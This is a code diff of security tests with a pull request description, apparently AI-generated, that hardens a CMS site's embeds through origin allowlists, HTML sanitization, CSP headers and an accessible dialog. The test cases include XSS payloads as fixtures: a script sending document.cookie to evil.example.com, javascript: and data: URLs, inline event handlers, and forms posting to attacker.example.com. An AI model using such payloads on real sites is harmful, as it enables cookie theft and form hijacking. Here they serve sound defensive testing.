+    // Escape closes the dialog and focus returns to the trigger.
+    await page.keyboard.press("Escape");
+    await expect(dialog).not.toBeVisible();
+    await expect(trigger).toBeFocused();
+  });
+
+  test("close button is reachable and labelled for screen readers", async ({
+    page,
+  }) => {
+    await page.getByTestId("open-update-dialog").click();
+    const dialog = page.getByRole("dialog");
+    const closeButton = dialog.getByRole("button", { name: "Close" });
+    await expect(closeButton).toBeVisible();
+    await closeButton.click();
+    await expect(dialog).not.toBeVisible();
+  });
+
+  test("refuses to render an embed that is not on the allowlist", async ({
+    page,
+  }) => {
+    await page.getByTestId("open-blocked-dialog").click();
+    await expect(page.getByRole("dialog")).toHaveCount(0);
+    await expect(page.locator("iframe")).toHaveCount(0);
+  });
+});

--- a/tests/int/embeds.int.spec.ts
+++ b/tests/int/embeds.int.spec.ts
@@ -1,0 +1,285 @@
+import { describe, expect, it } from "vitest";
+
+import {
+  extractIframeSrc,
+  getMailchimpBotFieldName,
+  resolveUpdateFormUrl,
+  validateNewsletterEmbedCodeField,
+  validateNewsletterSignupUrlField,
+  validateUpdateEmbedCodeField,
+  validateUpdateFormUrlField,
+  withUpdateFormPrefill,
+} from "@/lib/embeds/validation";
+import { sanitizeNewsletterEmbedHtml } from "@/lib/embeds/sanitize";
+import {
+  isAllowedFormActionUrl,
+  isAllowedIframeUrl,
+} from "@/lib/security/embedPolicy.mjs";
+
+const AIRTABLE_URL = "https://airtable.com/embed/appXyz/shrAbc";
+const MAILCHIMP_URL =
+  "https://example.us1.list-manage.com/subscribe/post?u=abc123&id=def456";
+
+describe("iframe origin allowlist", () => {
+  it("accepts https URLs on approved iframe hosts", () => {
+    expect(isAllowedIframeUrl(AIRTABLE_URL)).toBe(true);
+  });
+
+  it.each([
+    ["http (non-https)", "http://airtable.com/embed/appXyz/shrAbc"],
+    ["javascript scheme", "javascript:alert(document.cookie)"],
+    ["data scheme", "data:text/html,<script>alert(1)</script>"],
+    ["unapproved host", "https://evil.example.com/embed"],
+    ["lookalike host suffix", "https://airtable.com.evil.com/embed"],
+    ["lookalike host prefix", "https://notairtable.com/embed"],
+    ["subdomain of exact-match host", "https://foo.airtable.com/embed"],
+    ["empty string", ""],
+    ["not a URL", "airtable.com/embed"],
+  ])("rejects %s", (_label, url) => {
+    expect(isAllowedIframeUrl(url)).toBe(false);
+  });
+});
+
+describe("form-action origin allowlist", () => {
+  it("accepts https URLs on approved newsletter hosts", () => {
+    expect(isAllowedFormActionUrl(MAILCHIMP_URL)).toBe(true);
+  });
+
+  it.each([
+    ["http (non-https)", "http://example.us1.list-manage.com/subscribe/post"],
+    ["bare wildcard base domain", "https://list-manage.com/subscribe/post"],
+    ["lookalike host", "https://evillist-manage.com/subscribe/post"],
+    ["unapproved host", "https://attacker.example.com/collect"],
+  ])("rejects %s", (_label, url) => {
+    expect(isAllowedFormActionUrl(url)).toBe(false);
+  });
+});
+
+describe("extractIframeSrc", () => {
+  it("extracts the src of an iframe embed snippet", () => {
+    expect(
+      extractIframeSrc(
+        `<iframe class="airtable-embed" src="${AIRTABLE_URL}" width="100%"></iframe>`,
+      ),
+    ).toBe(AIRTABLE_URL);
+  });
+
+  it("returns null when there is no iframe src", () => {
+    expect(extractIframeSrc("<div>hello</div>")).toBeNull();
+    expect(extractIframeSrc(null)).toBeNull();
+  });
+});
+
+describe("resolveUpdateFormUrl", () => {
+  it("prefers the structured formUrl", () => {
+    expect(
+      resolveUpdateFormUrl({
+        formUrl: AIRTABLE_URL,
+        embedCode: `<iframe src="https://evil.example.com/x"></iframe>`,
+      }),
+    ).toBe(AIRTABLE_URL);
+  });
+
+  it("falls back to the legacy iframe snippet src", () => {
+    expect(
+      resolveUpdateFormUrl({
+        embedCode: `<iframe src="${AIRTABLE_URL}"></iframe>`,
+      }),
+    ).toBe(AIRTABLE_URL);
+  });
+
+  it("rejects URLs outside the allowlist", () => {
+    expect(
+      resolveUpdateFormUrl({ formUrl: "https://evil.example.com/embed" }),
+    ).toBeNull();
+    expect(
+      resolveUpdateFormUrl({
+        embedCode: `<iframe src="https://evil.example.com/embed"></iframe>`,
+      }),
+    ).toBeNull();
+    expect(resolveUpdateFormUrl(null)).toBeNull();
+  });
+});
+
+describe("withUpdateFormPrefill", () => {
+  it("adds prefill query params to the form URL", () => {
+    const result = new URL(
+      withUpdateFormPrefill(AIRTABLE_URL, {
+        promiseTitle: "Build 500km of roads",
+        promiseUrl: "https://checkmedia.org/promise/1",
+        updateDate: "2026-07-16T10:00:00Z",
+      }),
+    );
+    expect(result.searchParams.get("prefill_Promise")).toBe(
+      "Build 500km of roads",
+    );
+    expect(result.searchParams.get("prefill_CheckMedia Link")).toBe(
+      "https://checkmedia.org/promise/1",
+    );
+    expect(result.searchParams.get("hide_CheckMedia Link")).toBe("true");
+    expect(result.searchParams.get("prefill_Date")).toBe("2026-07-16");
+  });
+
+  it("leaves the URL unchanged when no prefill values are provided", () => {
+    expect(withUpdateFormPrefill(AIRTABLE_URL, {})).toBe(AIRTABLE_URL);
+  });
+});
+
+describe("getMailchimpBotFieldName", () => {
+  it("derives the honeypot field name from u and id params", () => {
+    expect(getMailchimpBotFieldName(MAILCHIMP_URL)).toBe("b_abc123_def456");
+  });
+
+  it("returns null when params are missing", () => {
+    expect(
+      getMailchimpBotFieldName("https://example.us1.list-manage.com/post"),
+    ).toBeNull();
+  });
+});
+
+describe("promise-update field validators", () => {
+  it("accepts an approved form URL and empty optional value", () => {
+    expect(validateUpdateFormUrlField(AIRTABLE_URL)).toBe(true);
+    expect(validateUpdateFormUrlField("")).toBe(true);
+  });
+
+  it("rejects non-allowlisted form URLs", () => {
+    expect(
+      validateUpdateFormUrlField("https://evil.example.com/embed"),
+    ).toMatch(/approved embed provider/);
+  });
+
+  it("requires either formUrl or embedCode", () => {
+    expect(validateUpdateEmbedCodeField("", null)).toMatch(/Provide/);
+    expect(validateUpdateEmbedCodeField("", AIRTABLE_URL)).toBe(true);
+  });
+
+  it("accepts a plain allowlisted iframe snippet", () => {
+    expect(
+      validateUpdateEmbedCodeField(`<iframe src="${AIRTABLE_URL}"></iframe>`),
+    ).toBe(true);
+  });
+
+  it.each([
+    [
+      "script tags",
+      `<script>steal()</script><iframe src="${AIRTABLE_URL}"></iframe>`,
+      /script/i,
+    ],
+    [
+      "inline event handlers",
+      `<iframe src="${AIRTABLE_URL}" onload="steal()"></iframe>`,
+      /event handler/i,
+    ],
+    ["snippets without an iframe", `<div>nothing</div>`, /iframe/i],
+    [
+      "non-allowlisted iframe src",
+      `<iframe src="https://evil.example.com/x"></iframe>`,
+      /approved embed provider/i,
+    ],
+  ])("rejects %s", (_label, snippet, message) => {
+    expect(validateUpdateEmbedCodeField(snippet)).toMatch(message);
+  });
+});
+
+describe("newsletter field validators", () => {
+  it("accepts an approved signup URL and empty optional value", () => {
+    expect(validateNewsletterSignupUrlField(MAILCHIMP_URL)).toBe(true);
+    expect(validateNewsletterSignupUrlField("")).toBe(true);
+  });
+
+  it("rejects non-allowlisted signup URLs", () => {
+    expect(
+      validateNewsletterSignupUrlField("https://evil.example.com/collect"),
+    ).toMatch(/approved newsletter provider/);
+  });
+
+  it("requires either signupUrl or embedCode", () => {
+    expect(validateNewsletterEmbedCodeField("", null)).toMatch(/Provide/);
+    expect(validateNewsletterEmbedCodeField("", MAILCHIMP_URL)).toBe(true);
+  });
+
+  it("accepts a plain Mailchimp form snippet", () => {
+    expect(
+      validateNewsletterEmbedCodeField(
+        `<form action="${MAILCHIMP_URL}" method="post"><input type="email" name="EMAIL" /></form>`,
+      ),
+    ).toBe(true);
+  });
+
+  it.each([
+    ["script tags", `<script>steal()</script>`, /script/i],
+    [
+      "inline event handlers",
+      `<form action="${MAILCHIMP_URL}"><input onfocus="steal()" /></form>`,
+      /event handler/i,
+    ],
+    ["iframes", `<iframe src="${AIRTABLE_URL}"></iframe>`, /iframe/i],
+    [
+      "forms posting to unapproved origins",
+      `<form action="https://attacker.example.com/collect"><input type="email" /></form>`,
+      /approved newsletter provider/i,
+    ],
+  ])("rejects %s", (_label, snippet, message) => {
+    expect(validateNewsletterEmbedCodeField(snippet)).toMatch(message);
+  });
+});
+
+describe("sanitizeNewsletterEmbedHtml", () => {
+  it("keeps an approved Mailchimp signup form intact", () => {
+    const html = `<div id="mc_embed_signup"><form action="${MAILCHIMP_URL}" method="post" target="_blank"><input type="email" name="EMAIL" class="email" placeholder="Email" required /><input type="submit" value="Subscribe" class="button" /></form></div>`;
+    const result = sanitizeNewsletterEmbedHtml(html);
+    expect(result).toContain(`action="${MAILCHIMP_URL.replace(/&/g, "&amp;")}"`);
+    expect(result).toContain('type="email"');
+    expect(result).toContain('type="submit"');
+  });
+
+  it("strips script tags and their content", () => {
+    const result = sanitizeNewsletterEmbedHtml(
+      `<div>ok</div><script>document.location="https://evil.example.com/?c="+document.cookie</script>`,
+    );
+    expect(result).not.toContain("script");
+    expect(result).not.toContain("evil.example.com");
+    expect(result).toContain("ok");
+  });
+
+  it("strips inline event handlers", () => {
+    const result = sanitizeNewsletterEmbedHtml(
+      `<div onmouseover="steal()"><input type="email" name="EMAIL" onfocus="steal()" /></div>`,
+    );
+    expect(result).not.toMatch(/on\w+=/i);
+  });
+
+  it("strips javascript: and non-https URLs", () => {
+    const result = sanitizeNewsletterEmbedHtml(
+      `<a href="javascript:alert(1)">a</a><a href="http://insecure.example.com">b</a><a href="https://safe.example.com">c</a>`,
+    );
+    expect(result).not.toContain("javascript:");
+    expect(result).not.toContain("http://insecure.example.com");
+    expect(result).toContain("https://safe.example.com");
+  });
+
+  it("removes forms that post to unapproved origins", () => {
+    const result = sanitizeNewsletterEmbedHtml(
+      `<form action="https://attacker.example.com/collect"><input type="email" name="EMAIL" /></form>`,
+    );
+    expect(result).not.toContain("form");
+    expect(result).not.toContain("attacker.example.com");
+  });
+
+  it("removes iframes, styles, and unsafe input types", () => {
+    const result = sanitizeNewsletterEmbedHtml(
+      `<iframe src="${AIRTABLE_URL}"></iframe><style>body{display:none}</style><input type="image" src="https://evil.example.com/x.png" />`,
+    );
+    expect(result).not.toContain("iframe");
+    expect(result).not.toContain("style");
+    expect(result).not.toContain("input");
+  });
+
+  it("adds rel=noopener to links", () => {
+    const result = sanitizeNewsletterEmbedHtml(
+      `<a href="https://safe.example.com" target="_blank">link</a>`,
+    );
+    expect(result).toContain('rel="noopener noreferrer"');
+  });
+});

--- a/tests/int/securityHeaders.int.spec.ts
+++ b/tests/int/securityHeaders.int.spec.ts
@@ -1,0 +1,77 @@
+import { describe, expect, it } from "vitest";
+
+import {
+  buildContentSecurityPolicy,
+  buildSecurityHeaders,
+} from "@/lib/security/headers.mjs";
+
+const getDirective = (csp: string, name: string) =>
+  csp
+    .split(";")
+    .map((part) => part.trim())
+    .find((part) => part.startsWith(`${name} `));
+
+describe("buildContentSecurityPolicy", () => {
+  const prodCsp = buildContentSecurityPolicy({ isDev: false });
+
+  it("restricts framing to self and approved embed providers only", () => {
+    expect(getDirective(prodCsp, "frame-src")).toBe(
+      "frame-src 'self' https://airtable.com",
+    );
+  });
+
+  it("restricts form submission to self and approved newsletter providers", () => {
+    expect(getDirective(prodCsp, "form-action")).toBe(
+      "form-action 'self' https://*.list-manage.com",
+    );
+  });
+
+  it("locks down baseline directives", () => {
+    expect(getDirective(prodCsp, "default-src")).toBe("default-src 'self'");
+    expect(getDirective(prodCsp, "object-src")).toBe("object-src 'none'");
+    expect(getDirective(prodCsp, "base-uri")).toBe("base-uri 'self'");
+    expect(getDirective(prodCsp, "frame-ancestors")).toBe(
+      "frame-ancestors 'self'",
+    );
+  });
+
+  it("supports MUI/Emotion inline styles and Sentry ingest", () => {
+    expect(getDirective(prodCsp, "style-src")).toContain("'unsafe-inline'");
+    expect(getDirective(prodCsp, "connect-src")).toContain(
+      "https://*.sentry.io",
+    );
+  });
+
+  it("only allows eval and websockets in development", () => {
+    expect(getDirective(prodCsp, "script-src")).not.toContain("'unsafe-eval'");
+    expect(getDirective(prodCsp, "connect-src")).not.toContain("ws:");
+
+    const devCsp = buildContentSecurityPolicy({ isDev: true });
+    expect(getDirective(devCsp, "script-src")).toContain("'unsafe-eval'");
+    expect(getDirective(devCsp, "connect-src")).toContain("ws:");
+  });
+});
+
+describe("buildSecurityHeaders", () => {
+  const prodHeaders = buildSecurityHeaders({ isDev: false });
+  const headerMap = new Map(prodHeaders.map(({ key, value }) => [key, value]));
+
+  it("includes the full baseline header set in production", () => {
+    expect(headerMap.get("Content-Security-Policy")).toBeTruthy();
+    expect(headerMap.get("X-Content-Type-Options")).toBe("nosniff");
+    expect(headerMap.get("Referrer-Policy")).toBe(
+      "strict-origin-when-cross-origin",
+    );
+    expect(headerMap.get("X-Frame-Options")).toBe("SAMEORIGIN");
+    expect(headerMap.get("Permissions-Policy")).toContain("camera=()");
+    expect(headerMap.get("Strict-Transport-Security")).toContain("max-age=");
+  });
+
+  it("omits HSTS in development", () => {
+    const devKeys = buildSecurityHeaders({ isDev: true }).map(
+      ({ key }) => key,
+    );
+    expect(devKeys).not.toContain("Strict-Transport-Security");
+    expect(devKeys).toContain("Content-Security-Policy");
+  });
+});


### PR DESCRIPTION
Closes #575 (parent: #572)

## What this does

Replaces unrestricted CMS-controlled active content with structured, allowlisted embed configuration, sanitizes the remaining legacy HTML, constrains iframes, adds a tested CSP + baseline security headers, and rebuilds the promise-update experience as an accessible MUI Dialog.

## Changes

### Structured embed configuration (no raw HTML where avoidable)
- **Promise updates** (`promise-updates` global): new `formUrl` field takes the https URL of the Airtable shared form. The legacy `embedCode` field remains, but only its iframe `src` URL is used — the HTML is never rendered. Both are validated at save time (scripts, inline event handlers, and non-allowlisted origins rejected) and re-validated at render time (`resolveUpdateFormUrl`). Only a validated URL string ever crosses the server/client boundary.
- **Newsletter** (site settings → Engagement): new `signupUrl` field takes the Mailchimp form action URL; the site renders its own first-party signup form (including Mailchimp's honeypot field). The legacy `embedCode` remains as a fallback only.
- The Airtable prefill logic now operates on a `URL` object instead of regex-replacing HTML.

### Sanitization of remaining HTML
Legacy newsletter embed HTML is sanitized server-side with `sanitize-html` before reaching `dangerouslySetInnerHTML`: scripts/styles/iframes stripped, all `on*` event handlers stripped (attribute allowlist), only `https:`/`mailto:` schemes allowed, and any `<form>` whose action is not on an approved newsletter provider is removed entirely.

### Allowlisted, constrained iframes
The embed origin allowlist lives in `src/lib/security/embedPolicy.mjs` — a single source of truth shared by the runtime validation, the Payload field validators, and the CSP. The update-form iframe is sandboxed to the documented minimum (`allow-scripts allow-forms allow-same-origin allow-popups allow-popups-to-escape-sandbox`), denies camera/microphone/geolocation/payment/fullscreen via `allow`, and sets `referrerpolicy="strict-origin-when-cross-origin"`. The dialog component refuses to render any non-allowlisted `src` (defense in depth).

### CSP and baseline security headers
`headers()` in `next.config.mjs` now applies a CSP built from the same allowlist (`frame-src`/`form-action` only include approved providers), plus `X-Content-Type-Options`, `Referrer-Policy`, `X-Frame-Options`, `Permissions-Policy`, and HSTS (production only). Directives accommodate MUI/Emotion inline styles, Next.js/Payload Admin inline scripts, Sentry (tunnel + direct ingest), and remote media. Rationale for every directive is documented.

### Accessible update dialog
`UpdateDialog` is now a real MUI `Dialog` with `aria-labelledby` pointing at a visible `DialogTitle`, native focus trapping, Escape handling, focus restoration, and a labelled close button — replacing the previous hidden-Dialog + hand-rolled fixed overlay.

### Tests
- `tests/int/embeds.int.spec.ts` (47 tests): allowlist acceptance/rejection (http, `javascript:`, `data:`, lookalike hosts), field validators, prefill URL building, sanitizer behavior.
- `tests/int/securityHeaders.int.spec.ts` (7 tests): CSP directive and header baseline assertions, dev/prod differences.
- `tests/e2e/security.e2e.spec.ts`: live response headers; dialog keyboard/screen-reader behavior (labelled `role="dialog"`, focus trap, Escape, focus restoration, labelled close button); sandbox attributes; refusal to render a non-allowlisted embed — via a dev-only harness at `/dev/update-dialog` (404s in production builds).

### Docs
`docs/security/embeds-and-csp.md` documents the allowlists, sandbox capabilities and rationale, CSP directives, and how to approve a new provider.

## Migration notes

- Existing `embedCode` values keep working: the Airtable iframe snippet's src is extracted and validated; Mailchimp HTML is sanitized. Editors should move to the new `formUrl`/`signupUrl` fields (marked "Preferred" in the admin UI).
- Both legacy fields are now optional; validation requires at least one of the pair to be set.
- MongoDB adapter — no migration needed for the new fields.

## Verification

- `pnpm exec tsc --noEmit` — clean (the 3 pre-existing `Share.tsx` errors also exist on `main`).
- `pnpm lint` — no errors in changed files.
- New vitest suites: 54/54 passing.
- Playwright suite added; not run locally (needs the dev server + DB) — CI should exercise it.

🤖 Generated with [Claude Code](https://claude.com/claude-code)